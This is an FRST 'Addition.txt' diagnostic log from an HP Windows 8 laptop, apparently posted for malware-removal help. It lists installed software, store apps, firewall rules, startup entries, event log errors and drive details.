µTorrent (HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\uTorrent) (Version: 3.5.5.45395 - BitTorrent Inc.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
888poker (HKLM-x32\...\{C70B2B8E-C7FE-46CB-9A5A-CCCFDB03649B}) (Version: 7.17.00033 - 888) Hidden
888poker (HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\InstallShield_{C70B2B8E-C7FE-46CB-9A5A-CCCFDB03649B}) (Version: 7.17.00033 - 888)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.257 - Adobe Systems Incorporated)
AmericasCardroom version 1.17.45 (HKLM-x32\...\{1B17EB4E-3E9C-4611-B8B5-31C0A00A1F68}_is1) (Version: 1.17.45 - Winning Poker Network, Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.8.2393 - AVAST Software)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version:  - Broadcom Corporation)
Broadcom Bluetooth Drivers (HKLM\...\{0A1B4690-E176-4533-8058-939480AEE1D0}) (Version: 12.0.0.9840 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 5.59 - Piriform)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DisableMSDefender (HKLM\...\{74FE39A0-FB76-47CD-84BA-91E2BBB17EF2}) (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Free Excel Viewer (HKLM-x32\...\{AE305EFA-F22D-47E9-90C4-88FF9307BC34}) (Version: 1.0.0 - Media Freeware)
GOM Audio (HKLM-x32\...\GOMAudio) (Version: 2.2.21.0 - GOM & Company)
GOM Player (HKLM-x32\...\GOM Player) (Version: 2.3.42.5304 - GOM & Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 75.0.3770.100 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
HP Documentation (HKLM-x32\...\{9BCC40C6-8A7C-4134-AF7D-9C2332E2DA80}) (Version: 1.1.0.0 - Hewlett-Packard)
HP System Event Utility (HKLM-x32\...\{7E9E39C4-3BD8-46E8-823F-A546A87E810C}) (Version: 1.1.12 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{403E9EFF-C4B4-4308-BA4E-7093B6BA03D5}) (Version: 2.5.5 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.10.0.2210 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3925 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.70.305.16316 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
partypoker (HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\PartyPoker) (Version:  - PartyGaming)
PokerStars (HKLM-x32\...\PokerStars) (Version:  - PokerStars)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.30176 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7339 - Realtek Semiconductor Corp.)
ShowMore Online Launcher version 1.7.7 (HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\{1484444C-6C76-491D-BDF4-F0DFC0891DE2}_is1) (Version: 1.7.7 - APOWERSOFT LIMITED)
Skype version 8.54 (HKLM-x32\...\Skype_is1) (Version: 8.54 - Skype Technologies S.A.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.29.0 - Synaptics Incorporated)
TeamViewer 14 (HKLM-x32\...\TeamViewer) (Version: 14.3.4730 - TeamViewer)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Amazon -> C:\Program Files\WindowsApps\Amazon.com.Amazon_3.1.1.1_x64__343d40qqvtj1t [2015-05-22] (Amazon.com)
Bing Translator -> C:\Program Files\WindowsApps\Microsoft.BingTranslator_1.7.2.0_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation)
Games -> C:\Program Files\WindowsApps\Microsoft.XboxLIVEGames_2.0.139.0_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
Getting Started with Windows 8 -> C:\Program Files\WindowsApps\AD2F1837.GettingStartedwithWindows8_1.5.3.1_neutral__v10z8vjag6ke6 [2015-05-22] (Hewlett-Packard Company)
HP Connected Drive -> C:\Program Files\WindowsApps\AD2F1837.HPFileViewer_1.1.12.59_x64__v10z8vjag6ke6 [2015-05-22] (Hewlett-Packard Company)
HP Connected Music -> C:\Program Files\WindowsApps\AD2F1837.HPConnectedMusic_1.1.0.162_x86__v10z8vjag6ke6 [2015-05-22] (Hewlett-Packard Company)
HP Connected Photo -> C:\Program Files\WindowsApps\AD2F1837.HPConnectedPhotopoweredbySnapfish_2.3.93.3308_neutral__v10z8vjag6ke6 [2015-05-22] (Hewlett-Packard Company)
HP Registration -> C:\Program Files\WindowsApps\AD2F1837.HPRegistration_1.2.1.142_neutral__v10z8vjag6ke6 [2015-05-22] (Hewlett-Packard Company)
McAfee® Central for HP -> C:\Program Files\WindowsApps\2703103D.McAfeeCentral_3.5.125.1_x64__4ehj4w4frejdr [2015-05-22] (.-McAfee Inc-.)
MSN Food & Drink -> C:\Program Files\WindowsApps\Microsoft.BingFoodAndDrink_3.0.4.212_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN Health & Fitness -> C:\Program Files\WindowsApps\Microsoft.BingHealthAndFitness_3.0.4.240_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_3.0.4.212_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN News -> C:\Program Files\WindowsApps\Microsoft.BingNews_3.0.4.213_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_3.0.4.244_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN Travel -> C:\Program Files\WindowsApps\Microsoft.BingTravel_3.0.4.212_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_3.0.4.249_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
Music -> C:\Program Files\WindowsApps\Microsoft.ZuneMusic_2.6.476.0_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
mysms - Text from Computer, Messaging -> C:\Program Files\WindowsApps\UptoElevenDigitalSolution.mysms-Textanywhere_2.3.1.1_x64__c9d6r4qvva5x8 [2015-05-22] (Up to Eleven Digital Solutions GmbH)
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_2.7.0.18_x64__mcm4njqhnhss8 [2015-05-22] (Netflix, Inc.)
Skype -> C:\Program Files\WindowsApps\Microsoft.SkypeApp_3.1.0.1005_x86__kzf8qxf38zg5c [2015-05-22] (Skype) [MS Ad]
The Weather Channel for HP -> C:\Program Files\WindowsApps\Weather.TheWeatherChannelforHP_1.1.1.0_x64__t3yemqpq4kp7p [2015-05-22] (The Weather Channel.)
TripAdvisor Hotels Flights Restaurants -> C:\Program Files\WindowsApps\TripAdvisorLLC.TripAdvisorHotelsFlightsRestaurants_1.2.0.24_neutral__qj0v5chwq8f2g [2015-05-22] (TripAdvisor LLC)
Video -> C:\Program Files\WindowsApps\Microsoft.ZuneVideo_2.6.408.0_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-4252122962-1682857245-3195559886-1001_Classes\CLSID\{D9AC5E73-BB10-467b-B884-AA1E475C51F5}\Shell\Open\Command -> C:\Program Files\Synaptics\SynTP\SynTPCpl.dll (Synaptics Incorporated -> Synaptics Incorporated)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2014-09-15] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
==================== Alternate Data Streams (Whitelisted) ========
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iaioi2ce.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\localhost -> localhost
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2013-08-22 14:25 - 2013-08-22 14:25 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Intel\TXE Components\TCS\;C:\Program Files\Intel\TXE Components\TCS\;C:\Program Files\Broadcom\Broadcom 802.11;;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Windows Live\Shared
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKLM\...\StartupApproved\Run: => "DptfPolicyLpmServiceHelper"
HKLM\...\StartupApproved\Run32: => "HPMessageService"
HKLM\...\StartupApproved\Run32: => "SynTPEnh"
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning"
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\StartupApproved\Run: => "Skype for Desktop"
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\StartupApproved\Run: => "uTorrent"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{DC516736-B1B6-4BC7-B4CE-E4F2A0A04E0F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{92487A26-BE1D-4072-8673-D72A48031CED}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{2F1E4741-FCDC-4112-B6C6-EE880C14B030}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{F3830B62-C5F7-44E6-8163-3A7889349527}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3480DAA0-33A5-4694-B68F-DB262B4ACBC1}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPSOCKSVC.exe (Hewlett-Packard Company -> Hewlett-Packard Development Company, L.P.)
FirewallRules: [{BF816976-23E7-4C03-A6CE-C702B21A2D0C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{953A6DCB-48B1-43A5-BD4E-C23BD8AD07F2}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{07979F8E-05DC-4725-9D0A-6381CA944ECD}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{A696B973-08D7-49CD-9D8B-04F2742CDB44}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{F23E9EDB-A226-42C9-9B92-CE2AABE38D5B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{A482FC95-FAA7-49DB-87FE-FE1A2A3AC10A}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{0FB38A11-4EC7-4E33-AB06-C0C7AEC27E77}] => (Allow) LPort=2869
FirewallRules: [{984F875A-8230-476A-ACF0-DA0F51A560CE}] => (Allow) LPort=1900
FirewallRules: [{6740BBFB-75A3-4180-9F62-1EF98C181F92}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{762AB279-939F-4B1B-AE19-13DB822BC00F}] => (Allow) C:\Users\JasonSt\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{BD76B0E5-B633-4EC2-9ECD-3E3617B1EF60}] => (Allow) C:\Users\JasonSt\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{0ACCE996-8C5F-44FD-8B75-EEA24D7DFF77}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D8AF2DDE-B885-42A3-BDA6-00AB4ACB6820}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{072D196F-43C5-4A49-BD8F-53C0C841AC70}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{97ECE254-219C-4460-A3F3-EC4AD0ADF583}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
==================== Restore Points =========================
28-11-2019 14:19:44 Scheduled Checkpoint
==================== Faulty Device Manager Devices ============
Name: USB Composite Device
Description: USB Composite Device
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard USB Host Controller)
Service: usbccgp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Event log errors: ========================
Application errors:
==================
Error: (11/29/2019 12:47:20 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service ".NETFramework" in DLL "C:\WINDOWS\system32\mscoree.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/29/2019 09:30:24 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "aspnet_state" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/29/2019 09:30:24 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "ASP.NET_64_2.0.50727" in DLL "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_perf.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/29/2019 09:30:24 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "ASP.NET_4.0.30319" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/29/2019 09:30:24 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "ASP.NET" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/28/2019 08:06:19 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "BITS" in DLL "C:\Windows\System32\bitsperf.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/28/2019 11:31:27 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service ".NETFramework" in DLL "C:\WINDOWS\system32\mscoree.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/27/2019 08:59:33 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "aspnet_state" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
System errors:
=============
Error: (11/29/2019 12:46:56 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 11:06:30 AM on ‎11/‎29/‎2019 was unexpected.
Error: (11/29/2019 09:29:53 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 10:40:19 PM on ‎11/‎28/‎2019 was unexpected.
Error: (11/28/2019 08:05:31 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 8:01:26 PM on ‎11/‎28/‎2019 was unexpected.
Error: (11/28/2019 03:30:35 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 3:12:20 PM on ‎11/‎28/‎2019 was unexpected.
Error: (11/28/2019 02:21:39 PM) (Source: DCOM) (EventID: 10010) (User: JasonS)
Description: The server {1B1F472E-3221-4826-97DB-2C2324D389AE} did not register with DCOM within the required timeout.
Error: (11/28/2019 02:21:09 PM) (Source: DCOM) (EventID: 10010) (User: JasonS)
Description: The server {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} did not register with DCOM within the required timeout.
Error: (11/28/2019 11:34:15 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\WINDOWS\System32\bcmihvsrv64.dll
Error: (11/28/2019 11:34:15 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\WINDOWS\System32\bcmihvsrv64.dll
==================== Memory info =========================== 
BIOS: Insyde F.08 12/26/2014
Motherboard: Hewlett-Packard 8023
Processor: Intel® Celeron® CPU N2840 @ 2.16GHz
Percentage of memory in use: 82%
Total physical RAM: 1939.04 MB
Available physical RAM: 335.41 MB
Total Virtual: 3347.04 MB
Available Virtual: 1568.59 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:21.37 GB) (Free:6.4 GB) NTFS
Drive e: () (Removable) (Total:7.39 GB) (Free:3.05 GB) FAT32
\\?\Volume{131776df-a79f-4219-ac20-29509132824c}\ (Images) (Fixed) (Total:7.37 GB) (Free:0.44 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (Size: 29.1 GB) (Disk ID: A136D194)
Partition: GPT.
==========================================================
Disk: 1 (Protective MBR) (Size: 7.4 GB) (Disk ID: 00000000)
Partition: GPT.
==================== End of Addition.txt =======================
